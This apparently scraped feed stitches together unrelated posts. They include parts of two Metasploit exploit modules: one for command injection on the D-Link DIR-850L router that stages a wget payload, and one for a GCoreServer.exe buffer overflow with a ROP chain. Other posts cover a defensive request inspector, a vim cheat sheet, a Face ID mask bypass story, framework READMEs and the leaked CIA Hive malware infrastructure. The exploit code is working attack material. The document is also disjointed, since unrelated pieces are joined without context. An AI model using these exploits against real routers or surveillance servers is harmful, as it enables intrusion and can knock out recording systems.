      hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
      send_request_cgi({
        'uri'    => '/authentication.cgi',
        'method' => 'POST',
        'data'   => "id=#{username}&password=#{hash}",
        'cookie' => "uid=#{uid}"
      })
      return uid
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  def execute_command(cmd, opts)
    uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
    payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
    payload << "<postxml>\r\n"
    payload << "<module>\r\n"
    payload << "  <service>DEVICE.TIME</service>\r\n"
    payload << "  <device>\r\n"
    payload << "    <time>\r\n"
    payload << "      <ntp>\r\n"
    payload << "        <enable>1</enable>\r\n"
    payload << "        <period>604800</period>\r\n"
    payload << "        <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
    payload << "      </ntp>\r\n"
    payload << "      <ntp6>\r\n"
    payload << "        <enable>1</enable>\r\n"
    payload << "        <period>604800</period>\r\n"
    payload << "      </ntp6>\r\n"
    payload << "      <timezone>20</timezone>\r\n"
    payload << "      <time/>\r\n"
    payload << "      <date/>\r\n"
    payload << "      <dst>0</dst>\r\n"
    payload << "      <dstmanual/>\r\n"
    payload << "      <dstoffset/>\r\n"
    payload << "    </time>\r\n"
    payload << "  </device>\r\n"
    payload << "</module>\r\n"
    payload << "</postxml>"
    begin
      # save configuration
      res = send_request_cgi({
        'uri'    => '/hedwig.cgi',
        'method' => 'POST',
        'ctype'  => 'text/xml',
        'data'   => payload,
        'cookie' => "uid=#{uid}"
      })
      # execute configuration
      res = send_request_cgi({
        'uri'    => '/pigwidgeon.cgi',
        'method' => 'POST',
        'data'   => 'ACTIONS=SETCFG,ACTIVATE',
        'cookie' => "uid=#{uid}"
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  def exploit
    print_status("#{peer} - Connecting to target...")
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
    end

    #
    # Information Retrieval, obtains creds and logs in
    #
    @username, @password = retrieve_creds
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200
    )
  end
end

Download dlink_dir850l_unauth_exec.rb.txt

Source
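Two of the posts above describe requests that a device's embedded web server should never have accepted: the Vivotek advisory's upgrade.cgi request whose Content-Length is not a number (and its minimal form with no valid request line at all), and the DIR-850L module's POST to /hedwig.cgi whose XML `<service>` element carries a `../` path. The following added example is not from either post; it is a small request inspector of the kind you would put in front of such devices (in a reverse proxy, an IDS preprocessor or a WAF rule), with both checks written as rules and run over constructed samples. The first two samples are the request shapes the advisory quotes, the third follows the XML the module posts, and the rule names and the 2048-byte line limit are assumptions chosen for this example.

```python
import re

# Constructed samples, not captured traffic.
VIVOTEK_POC = (
    "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\n"
    "Content-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
)
VIVOTEK_MINIMAL = (
    "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
)
DIR850L_CRED_LEAK = (
    "POST /hedwig.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\nContent-Type: text/xml\r\n"
    "Cookie: uid=abcdefgh\r\nContent-Length: 150\r\n\r\n"
    '<?xml version="1.0" encoding="utf-8"?>\r\n<postxml>\r\n<module>\r\n'
    "  <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
    "</module>\r\n</postxml>"
)
BENIGN = "GET /index.html HTTP/1.1\r\nHost: camera.example\r\n\r\n"

REQUEST_LINE = re.compile(r"^[A-Z]{3,10} \S+ HTTP/\d\.\d$")
MAX_LINE = 2048  # assumption: no legitimate request line or header value this long


def split_request(raw):
    """Split a raw HTTP request into (request line, {lowercased header: value}, body)."""
    if isinstance(raw, bytes):
        raw = raw.decode("latin-1")
    # First blank line ends the headers; accept bare LF as well as CRLF, since the
    # Vivotek server does.
    m = re.search(r"\r?\n\r?\n", raw)
    head, body = (raw[: m.start()], raw[m.end():]) if m else (raw, "")
    lines = head.split("\n")
    request_line = lines[0].rstrip("\r")
    headers = {}
    for line in lines[1:]:
        line = line.rstrip("\r")
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def inspect_request(raw):
    """Return the names of the rules the request trips (empty list = nothing found)."""
    findings = []
    request_line, headers, body = split_request(raw)

    # Rule 1: the request line must be METHOD SP target SP HTTP/x.y.
    if not REQUEST_LINE.match(request_line):
        findings.append("request_line_malformed")

    # Rule 2: nothing the parser copies into a fixed buffer may be oversized.
    if len(request_line) > MAX_LINE or any(len(v) > MAX_LINE for v in headers.values()):
        findings.append("oversized_line")

    # Rule 3: Content-Length is a decimal integer, never free text.
    content_length = headers.get("content-length")
    if content_length is not None and not content_length.isdigit():
        findings.append("content_length_not_numeric")

    # Rule 4: a <service> name posted to hedwig.cgi must not traverse directories.
    parts = request_line.split(" ")
    path = parts[1] if len(parts) >= 3 else ""
    if path.startswith("/hedwig.cgi"):
        m = re.search(r"<service>\s*([^<]*)</service>", body)
        if m and "../" in m.group(1):
            findings.append("hedwig_service_traversal")

    return findings


if __name__ == "__main__":
    for name, sample in [("vivotek_poc", VIVOTEK_POC), ("vivotek_minimal", VIVOTEK_MINIMAL),
                         ("dir850l", DIR850L_CRED_LEAK), ("benign", BENIGN)]:
        print(name, inspect_request(sample))
```

Rules 1 to 3 are generic and worth running on any embedded HTTP endpoint: a non-numeric Content-Length or a request with no parseable request line has no legitimate purpose and is cheap to drop before it reaches a parser that copies header values into a fixed stack buffer. Rule 4 is device specific and mirrors the `<service>` path the module sends.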
-
Note: If you’re decent at vim and want your mind blown, check out Advanced Vim.

I’ve compiled a list of essential vim commands that I use every day. I then give a few instructions on how to make vim as great as it should be, because it’s painful without configuration.

Cursor movement (Inside command/normal mode)

w - jump by start of words (punctuation considered words)
W - jump by words (spaces separate words)
e - jump to end of words (punctuation considered words)
E - jump to end of words (no punctuation)
b - jump backward by words (punctuation considered words)
B - jump backward by words (no punctuation)
0 - (zero) start of line
^ - first non-blank character of line (same as 0w)
$ - end of line

Advanced (in order of what I find useful)

Ctrl+d - move down half a page
Ctrl+u - move up half a page
} - go forward by paragraph (the next blank line)
{ - go backward by paragraph (the next blank line)
gg - go to the top of the page
G - go to the bottom of the page
: [num] [enter] - Go To that line in the document

Searching

f [char] - Move to the next char on the current line after the cursor
F [char] - Move to the next char on the current line before the cursor
t [char] - Move to before the next char on the current line after the cursor
T [char] - Move to before the next char on the current line before the cursor

All these commands can be followed by ; (semicolon) to go to the next searched item, and , (comma) to go to the previous searched item

Insert/Appending/Editing Text

Results in insert mode
i - start insert mode at cursor
I - insert at the beginning of the line
a - append after the cursor
A - append at the end of the line
o - open (append) blank line below current line (no need to press return)
O - open blank line above current line
cc - change (replace) an entire line
c [movement command] - change (replace) from the cursor to the move-to point. ex. ce changes from the cursor to the end of the cursor word
Esc - exit insert mode
r [char] - replace a single character with the specified char (does not use insert mode)
d - delete
d [movement command] - deletes from the cursor to the move-to point. ex. de deletes from the cursor to the end of the current word
dd - delete the current line

Advanced

J - join line below to the current one

Marking text (visual mode)

v - starts visual mode
From here you can move around as in normal mode (hjkl etc.) and can then do a command (such as y, d, or c)
V - starts linewise visual mode
Ctrl+v - start visual block mode
Esc - exit visual mode

Advanced

O - move to Other corner of block
o - move to other end of marked area

Visual commands

Type any of these while some text is selected to apply the action
y - yank (copy) marked text
d - delete marked text
c - delete the marked text and go into insert mode (like c does above)

Cut and Paste

yy - yank (copy) a line
p - put (paste) the clipboard after cursor
P - put (paste) before cursor
dd - delete (cut) a line
x - delete (cut) current character
X - delete previous character (like backspace)

Exiting

:w - write (save) the file, but don't exit
:wq - write (save) and quit
:q - quit (fails if anything has changed)
:q! - quit and throw away changes

Search/Replace

/pattern - search for pattern
?pattern - search backward for pattern
n - repeat search in same direction
N - repeat search in opposite direction
:%s/old/new/g - replace all old with new throughout file (gn is better though)
:%s/old/new/gc - replace all old with new throughout file with confirmations

Working with multiple files

:e filename - Edit a file
:tabe - make a new tab
gt - go to the next tab
gT - go to the previous tab

Advanced

:vsp - vertically split windows
ctrl+ws - Split windows horizontally
ctrl+wv - Split windows vertically
ctrl+ww - switch between windows
ctrl+wq - Quit a window

Marks

Marks allow you to jump to designated points in your code.
m{a-z} - Set mark {a-z} at cursor position
A capital mark {A-Z} sets a global mark and will work between files
‘{a-z} - move the cursor to the start of the line where the mark was set
‘’ - go back to the previous jump location

General

u - undo
Ctrl+r - redo
. - repeat last command

Making Vim actually useful

Vim is quite unpleasant out of the box. For example, typing :w for every file save is awkward and copying and pasting to the system clipboard does not work. But a few changes will get you much closer to the editor of your dreams.

.vimrc

My .vimrc file has some pretty great ideas I haven't seen elsewhere. This is a minimal vimrc that focuses on three priorities:

adding options that are strictly better (like more information showing in autocomplete)
more convenient keystrokes (like [space]w for write, instead of :w [enter])
a similar workflow to normal text editors (like enabling the mouse)

Installation

Copy this to your home directory and restart vim. Read through it to see what you can now do (like [space]w to save a file)

mac users - making a hidden normal file is surprisingly tricky. Here’s one way:
in the command line, go to the home directory
type nano .vimrc
paste in the contents of the .vimrc file
ctrl+x, y, [enter] to save

You should now be able to press [space]w in normal mode to save a file.

[space]p should paste from the system clipboard (outside of vim). If you can’t paste, it’s probably because vim was not built with the system clipboard option. To check, run vim --version and see if +clipboard exists. If it says -clipboard, you will not be able to copy from outside of vim.

For mac users, homebrew installs vim with the clipboard option. Install homebrew and then run brew install vim. Then move the old vim binary:

$ mv /usr/bin/vim /usr/bin/vimold

Restart your terminal and you should see vim --version now with +clipboard

Plugins

The easiest way to make vim more powerful is to use Vintageous in sublime (version 3). This gives you Vim mode inside sublime. I suggest this (or a similar setup with the Atom editor) if you aren't a vim master. Check out Advanced Vim if you are.

Vintageous is great, but I suggest you change a few settings to make it better.

Clone this repository to ~/.config/sublime-text-3/Packages/Vintageous, or similar. Then check out the "custom" branch. Alternatively, you can get a more updated Vintageous version by cloning the official repo and then copying over this patch.

Change the user settings (User/Preferences.sublime-settings) to include:

"caret_style": "solid"

This will make the cursor not blink, like in vim. sublime might freeze when you do this. It’s a bug; just restart sublime after changing the file.

ctrl+r in vim means "redo". But there is a handy ctrl+r shortcut in sublime that gives an "outline" of a file. I remapped it to alt+r by putting this in the User keymap

{ "keys": ["alt+r"], "command": "show_overlay", "args": {"overlay": "goto", "text": "@"} },

Add the ability to toggle vintageous on and off

Mac users: you will not have the ability to hold down a navigation key (like holding j to go down). To fix this, run the commands specified here: https://gist.github.com/kconragan/2510186

Now you should be able to restart sublime and have a great vim environment! Sweet Dude.

Switch Caps Lock and Escape

I highly recommend you switch the mapping of your caps lock and escape keys. You'll love it, promise! Switching the two keys is platform dependent; google should get you the answer

Other

I don’t personally use these yet, but I’ve heard other people do!

:wqa - Write and quit all open tabs (thanks Brian Zick)

Source: http://vimsheet.com/
-
I'd like to take his... his Face ID... off

Apple's facial-recognition login system in its rather expensive iPhone X can be, it is claimed, fooled by a 3D printed mask, a couple of photos, and a blob of silicone.

Bkav Corporation, a tech security biz with offices in the US and Singapore, specializes in bypassing facial-recognition systems, and set out to do the same with Face ID when it got hold of a $999 iPhone X earlier this month. The team took less than a week to apparently crack Cupertino's vaunted new security mechanism, demonstrating that miscreants can potentially unlock a phone with a mask of the owner's face.

"Everything went much more easily than you expect. You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face," the biz said in an advisory last updated on Saturday. "It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought."

After registering a person's face on the phone – and the handset should only unlock when it sees this face – the team built a 3D printed mask of the test subject using an off-the-shelf 3D printer. They then put 2D printouts of the user's eyes, upper cheekbones and lips over the mask and added a silicone nose for realism.

The creation wasn't able to defeat Face ID at first, as other folks with the same idea have found. But by sculpting and shading the false nose on one side to imitate shadow – plus a few other tweaks – the team managed to use the mask to fool the iPhone X into unlocking, it is claimed.

The hack was cheap – Bkav estimates the total cost in materials for a face to hoodwink Face ID was around $150. It acknowledged that the hack isn't for everyone to try out. It requires an in-depth knowledge of how Apple's face-scanning software works and what the weak points in the system are.
"With Face ID's being beaten by our mask, FBI, CIA, country leaders, leaders of major corporations, etc are the ones that need to know about the issue, because their devices are worth illegal unlock attempts," it said. "Exploitation is difficult for normal users, but simple for professional ones." The team is still researching how to crack the system more easily and refining their methods. In the meantime the biz advises sticking to fingerprints for biometric security. ® Via theregister.co.uk
-
YallaJS makes it easy to create an HtmlTemplate and render it to the DOM efficiently.

import {Context,render} from 'yallajs';

// we pull the html Tagged Template literal from the Context object.
let {html} = new Context();

// create a template function that produces the HtmlTemplate "<div>Hello xxx </div>"
let hello = (name) => html`<div>Hello ${name}</div>`;

// render <div>Hello world</div> to document.body.
render(hello('world'),document.body);

// render <div>Hello yallajs</div> to document.body.
render(hello('yallajs'),document.body);

yallajs has 3 main APIs:

render : a function that renders an HtmlTemplate or HtmlTemplateCollection into a node.
html : a contextual Tagged Template Literal that generates an HtmlTemplate object from HTML strings.
htmlCollection : a contextual Tagged Template Literal that generates an HtmlTemplateCollection for rendering arrays of objects.
Context : an object that stores local information such as the HtmlTemplate cache (in most cases you don't have to do anything with this object).

Motivation

yallajs has the following main goals:

Highly efficient in DOM creation, updates and deletion.
Easy to use and very simple to understand.
Using web standards instead of creating new ones.
Very small size and no dependencies.
Support for ES5 browsers such as IE 9, iOS 6 and Android 5.

How it works

html Tagged Template Literals

The html tag processes a Template Literal and generates an HtmlTemplate object out of it. Template literals are string literals allowing embedded expressions. You can use multi-line strings and string interpolation features with them. Template literals are enclosed by the back-tick (` `) character instead of double or single quotes. Template literals can contain placeholders. These are indicated by the dollar sign and curly braces (${expression}). The expressions in the placeholders and the text between them get passed to the html tag function.

render

HtmlTemplate rendering

render() takes an HtmlTemplate, HtmlTemplateCollection, Text or Promise, and renders it to a DOM container. The rendering process runs in the following order:

yallajs takes the static strings in the HtmlTemplate and joins them with <!--outlet--> to mark the position of the dynamic parts.
yallajs passes the joined string to innerHTML to create the DOMTemplate.
It walks through the DOMTemplate and identifies the outlet comment tags.
On initial rendering yallajs updates the outlets with the actual values.
After that yallajs stores the updated DOMTemplate in the Context object.
Lastly yallajs clones the DOMTemplate to create an HtmlTemplateInstance and appends it to the DOM container.

By keeping the template DOM in the cache, the next DOM creation is done in two steps only: look up the template DOM and update the outlets with the next values, then clone the template DOM and append it to the DOM container. In this way the DOM update process is also very efficient, because the location of each placeholder is already known: if a value changes, only that placeholder is updated, without touching the rest of the DOM.

Performance

The benchmark results of the yallajs 2.0 beta version are very promising. With very early-stage performance tuning, yallajs wins against Angular, React and Vue, both on rendering and memory allocation. The following benchmark results use Stefan Krause's performance benchmark.

Memory

yallajs memory usage also shows very promising results. You can find the details here, and the code that we use in this benchmark here.

Features

Yalla uses ES2015 template literals for HTML templating. The yallajs API is very simple, making yallajs almost invisible in your code, so your application stays clean with no boilerplate.
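As an added illustration of the render pipeline described under "How it works" (this is not yallajs code: yallajs builds a DOM template via innerHTML and walks it for outlet comments, while this model stays at the string level so it runs in plain Node), the block below joins the statics with <!--outlet-->, scans the outlet positions once per template site and caches them on a Context, then fills the outlets on every render. It also makes explicit the trust boundary the design implies: the static strings are the author's HTML, the dynamic values are data and are rendered as text. The Context, renderToString, escapeHtml and demo names and the sample inputs are this example's own.

```javascript
'use strict';

const OUTLET = '<!--outlet-->';

// The Context holds the template cache. It is keyed by the strings array the
// engine hands the tag function: for a given template literal site that array
// is the same object on every evaluation, so the join and the outlet scan run
// once per site, not once per render. (yallajs caches a DOM template built via
// innerHTML; this model caches the joined string and the outlet offsets.)
class Context {
  constructor() {
    this.cache = new WeakMap();
    this.compiles = 0; // how often a template had to be built from scratch
    this.html = (strings, ...values) => ({ tpl: this.compile(strings), values });
  }

  compile(strings) {
    let tpl = this.cache.get(strings);
    if (tpl) return tpl;
    // Join the statics with the outlet marker, then record where each outlet sits.
    const joined = strings.join(OUTLET);
    const outlets = [];
    for (let at = joined.indexOf(OUTLET); at !== -1; at = joined.indexOf(OUTLET, at + OUTLET.length)) {
      outlets.push(at);
    }
    tpl = { joined, outlets };
    this.cache.set(strings, tpl);
    this.compiles += 1;
    return tpl;
  }
}

// Static strings are the author's markup and are trusted as HTML; dynamic values
// are data. yallajs puts values into outlets as DOM text nodes, which cannot
// introduce markup; at string level the equivalent is escaping. Skipping this
// step is what turns a template engine into an HTML-injection sink.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Render an HtmlTemplate, an array of them (the collection case), or plain text
// by filling the cached outlet positions of the template.
function renderToString(node) {
  if (node === null || node === undefined) return '';
  if (Array.isArray(node)) return node.map(renderToString).join('');
  if (typeof node === 'object' && node.tpl) {
    const { joined, outlets } = node.tpl;
    let out = '';
    let cursor = 0;
    node.values.forEach((value, i) => {
      out += joined.slice(cursor, outlets[i]) + renderToString(value);
      cursor = outlets[i] + OUTLET.length;
    });
    return out + joined.slice(cursor);
  }
  return escapeHtml(node);
}

// Demo on constructed input: the same template site rendered twice compiles
// once, a value carrying markup comes out inert, and templates nest.
function demo() {
  const ctx = new Context();
  const { html } = ctx;
  const hello = (name) => html`<div>Hello ${name}</div>`;
  const first = renderToString(hello('world'));
  const second = renderToString(hello('<script>x()</script>'));
  const nested = renderToString(html`<ul>${['a', 'b'].map((x) => html`<li>${x}</li>`)}</ul>`);
  return { first, second, nested, compiles: ctx.compiles };
}

console.log(demo());
```

The compile counter is the observable side of the cache: three template sites are used in demo(), so compiles is 3 no matter how many times each is rendered. The escaping step is where this model differs from a naive string template; yallajs gets the same guarantee structurally from inserting text nodes.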
Overview

Events

function buttonListener(){
  alert('hello');
}
render(html`<input type="button" onclick="${e => buttonListener()}">`,document.body);

Attribute

render(html`<div style="color : ${dynamicColor}; font-size : ${fontSize};" >This is a Node</div>`,document.body);

HtmlTemplate in HtmlTemplate

render(html`<div>This is Parent Node ${html`<div>This is Child Node</div>`} </div>`,document.body);

htmlCollection

HtmlTemplateCollection

HtmlTemplateCollection is a high-performance object that maps an array of items to an array of HtmlTemplates. HtmlTemplateCollection requires a key for each item to update the collection effectively.

htmlCollection(arrayItems,keyFunction,templateFunction);

Example

let martialArtists = [
  {id:1,name:'Yip Man'},
  {id:2,name:'Bruce Lee'},
  {id:3,name:'Jackie Chan'}];

render(html`
<table>
  <tbody>
  ${htmlCollection(martialArtists,(data) => data.id, (data,index) => html`
    <tr><td>${data.name}</td></tr>
  `)}
  </tbody>
</table>
`,document.body);

Sample Project

TodoMVC : a simple todomvc application
Benchmark : benchmark tools for measuring performance, a fork of Stefan Krause's github project

Codepen samples

Hello world : basic hello world application
Simple Calculator : simple calculator with yallajs
Color Picker : simple color picker
Async : example using Promise for async
Html Collection : using HtmlCollection to render arrays
Hero Editor : Hero Editor tutorial from Angular JS rewritten in Yallajs

Download: yalla-master.zip or git clone https://github.com/yallajs/yalla.git
Source: https://github.com/yallajs/yalla
-
Well, what are you referring to? Speed, anonymity, etc.?
-
Merly.jl

Micro framework for web programming in Julia.

Merly is a micro framework for declaring routes and handling requests. Quickly create web applications in Julia with minimal effort.

Roadmap

Below are some of the features that are planned to be added in future versions of Faker.jl once version 1.0 of the language is released. All contributions and suggestions are welcome!

Version 0.1.0 - Julia version 1.0 syntax update
Version 0.1.1 - Implementation of verbose
Version 0.1.2 - Implementation of a websocket module
Version 0.1.3 - Performance improvement
Version 0.1.4 - Threads implementation

Installing

Pkg.add("Merly") #Release
Pkg.clone("git://github.com/codeneomatrix/Merly.jl.git") #Development

Example

using Merly

global u
u="hello"

server = Merly.app()

@page "/" "Hello World!"
@page "/hola/:usr" "<b>Hello {{usr}}!</b>"

@route GET "/get/:data" begin
  "get this back: {{data}}"
end

@route POST "/post" begin
  "I did something!"
end

@route POST|PUT|DELETE "/" begin
  println("params: ",q.params)
  println("query: ",q.query)
  println("body: ",q.body)
  r.headers["Content-Type"]="text/plain"
  "I did something!"
end

Get("/data", (q,r)->(begin
  r.headers["Content-Type"]="text/plain"
  "$u data"
end))

Post("/data", (q,r)->(begin
  println("params: ",q.params)
  println("query: ",q.query)
  println("body: ",q.body)
  r.headers["Content-Type"]="text/plain"
  global u="bye"
  "I did something!"
end))

server.start("localhost", 8080)

Features available in the current release

Parameters dictionary

@route GET "/get/:data" begin
  "get this back: "*q.params["data"]
end

URL query dictionary

@route POST|PUT|DELETE "/" begin
  r.headers["Content-Type"]="text/plain"
  "I did something! "*q.query["value1name"]
end

Dictionary of body

Payload:
{"data1":"Hello"}

@route POST|PUT|DELETE "/" begin
  r.headers["Content-Type"]="text/plain"
  "Payload data "*q.body["data1"]
end

Payload:
<Data>
  <Data1>Hello World!</Data1>
</Data>

@route POST|PUT|DELETE "/" begin
  r.headers["Content-Type"]="text/plain"
  "Payload data "*q.body["Data"]["Data1"]
end

Reply JSON

@route POST|PUT|DELETE "/" begin
  r.headers["Content-Type"]="application/json"
  r.status = 200 #optional
  "{\"data1\":2,\"data2\":\"t\"}"
end

or

@route POST|PUT|DELETE "/" begin
  r.headers["Content-Type"]="application/json"
  info=Dict()
  info["data1"]=2
  info["data2"]="t"
  r.status = 200 #optional
  JSON.json(info)
end

Reply XML

@route POST|PUT|DELETE "/" begin
  r.headers["Content-Type"]="application/xml"
  "<ListAllMyBucketsResult>
    <Buckets>
      <Bucket><Name>quotes</Name><CreationDate>2006-02-03T16:45:09.000Z</CreationDate></Bucket>
      <Bucket><Name>samples</Name><CreationDate>2006-02-03T16:41:58.000Z</CreationDate></Bucket>
    </Buckets>
  </ListAllMyBucketsResult>"
end

Reply File

server = Merly.app("Path","load") #example: ("D:\\EXAMPLE\\src","*") default: (pwd(),"")

@page "/" File("Index.html", r)

Possible values of load:
"*" - load all the files located in the path, except those whose names start with "."
"jl", "clj|jl|py" - extensions of files that will not be exposed
"" - any file (the default)

Not found message

server.notfound("<!DOCTYPE html>
<html>
<head><title>Not found</title></head>
<body><h1>404, Not found</h1></body>
</html>")

server.notfound("notfound.html")

CORS

server.use("CORS")

Bonus

If you forgot the MIME type of a file you can use the following instruction:

r.headers["Content-Type"]=mimetypes["file extension"]

Download: Merly.jl-master.zip or git clone https://github.com/codeneomatrix/Merly.jl.git
Source: https://github.com/codeneomatrix/Merly.jl
-
An Introduction To React And The Surrounding Ecosystem In 2017 https://thejavascriptchronicles.com
-
skype-log-viewer Download and View Skype History Without Skype This program allows you to view all of your skype chat logs and then easily export them as text files. It correctly organizes them by conversation, and makes sure that group conversations do not get jumbled with one on one chats. Features Download Skype Logs Broken Database Support Change Export Format Organized by conversation in skype Download: skype-log-viewer-master.zip Source: https://github.com/lordgreggreg/skype-log-viewer
-
Hive

Today, 9 November 2017, WikiLeaks publishes the source code and development logs to Hive, a major component of the CIA infrastructure to control its malware.

Hive solves a critical problem for the malware operators at the CIA. Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention. Using Hive, even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet. Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA.

Hive can serve multiple operations using multiple implants on target computers. Each operation anonymously registers at least one cover domain (e.g. "perfectly-boring-looking-domain.com") for its own use. The server running the domain website is rented from commercial hosting providers as a VPS (virtual private server) and its software is customized according to CIA specifications. These servers are the public-facing side of the CIA back-end infrastructure and act as a relay for HTTP(S) traffic over a VPN connection to a "hidden" CIA server called 'Blot'.

The cover domain delivers 'innocent' content if somebody browses it by chance. A visitor will not suspect that it is anything else but a normal website. The only peculiarity is not visible to non-technical users - an HTTPS server option that is not widely used: Optional Client Authentication. Hive uses the uncommon Optional Client Authentication so that a user browsing the website is not required to authenticate - it is optional. But implants talking to Hive do authenticate themselves and can therefore be detected by the Blot server.

Traffic from implants is sent to an implant operator management gateway called Honeycomb (see graphic above), while all other traffic goes to a cover server that delivers the unsuspicious content for all other users.

Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities. The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow, pretending to be signed by Thawte Premium Server CA, Cape Town. In this way, if the target organization looks at the network traffic coming out of its network, it is likely to misattribute the CIA exfiltration of data to uninvolved entities whose identities have been impersonated.

The documentation for Hive is available from the WikiLeaks Vault7 series.

Source: wikileaks.org
-
ClickHouse is an open source column-oriented database management system capable of real time generation of analytical data reports using SQL queries. Blazing Fast Linearly Scalable Hardware Efficient Fault Tolerant Feature Rich Highly Reliable Simple and Handy ClickHouse. Just makes you think faster. Run more queries in the same amount of time Test more hypotheses Slice and dice your data in many more new ways Look at your data from new angles Discover new dimensions Read more... Download: ClickHouse-master.zip or git clone https://github.com/yandex/ClickHouse.git Sources: https://clickhouse.yandex/ https://github.com/yandex/ClickHouse/
-
This Metasploit module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'
require 'open-uri'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE',
      'Description'    => %q{
        This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).
        The vulnerable webserver is running on Port 13003 and Port 13004, does not require
        authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luca Cappiello',
          'Maurice Popp'
        ],
      'References'     =>
        [
          ['EDB', '41153'],
          ['CVE', '2017-11517'],
          ['URL', 'www.geutebrueck.com']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }],
          ['GCore 1.3.8.42, Windows x64 (Win7+)', { 'Arch' => ARCH_X64 }],
          ['GCore 1.4.2.37, Windows x64 (Win7+)', { 'Arch' => ARCH_X64 }]
        ],
      'Payload'        => { 'Space' => '2000' },
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 24 2017',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(13003)])
  end

  def fingerprint
    print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
    @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"))
    statistics = @doc.css('modulestate')
    statistics.each do |x|
      if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')
        mytarget = targets[1]
        print_status("Vulnerable version detected: #{mytarget.name}")
        return Exploit::CheckCode::Appears, mytarget
      elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37')
        mytarget = targets[2]
        print_status("Vulnerable version detected: #{mytarget.name}")
        return Exploit::CheckCode::Appears, mytarget
      end
    end
    print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
    print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.')
    print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')
    print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')
    [Exploit::CheckCode::Unknown, nil]
  end

  def check
    fingerprint
  end

  def ropchain(target)
    rop = ''
    # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
    stack_align = "\x43" * 16

    if target.name.include? '1.3.8.42'
      print_status('Preparing ROP chain for target 1.3.8.42!')

      # 0x140cd00a9 | add rsp, 0x10 ; ret
      # This is needed because the next 16 bytes are sometimes messed up.
      overwrite = [0x140cd00a9].pack('Q<')

      # We have 40 bytes left to align our stack!
      # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
      # and to restore it.
      # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
      # 0x1404e5cbf: mov edx, esp ; ret
      stack_align << [0x1404e5cbf].pack('Q<')

      # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
      # We pop -XXXXX as \xxxxxxxxx to rax
      # 0x14013db94 pop rax ; ret
      stack_align << [0x14013db94].pack('Q<')
      stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')

      # Our value is enough.
      # 0x1407dc547 | add rax,rdx ; ret
      stack_align << [0x1407dc547].pack('Q<')

      # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
      # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret
      stack_align << [0x140ce9ac0].pack('Q<')

      # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
      # We want RCX to hold the value for VP Argument "Address of Shellcode"
      # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ;
      rop << [0x140cc2234].pack('Q<')
      rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aligning with "add rsp, 0x28" ;

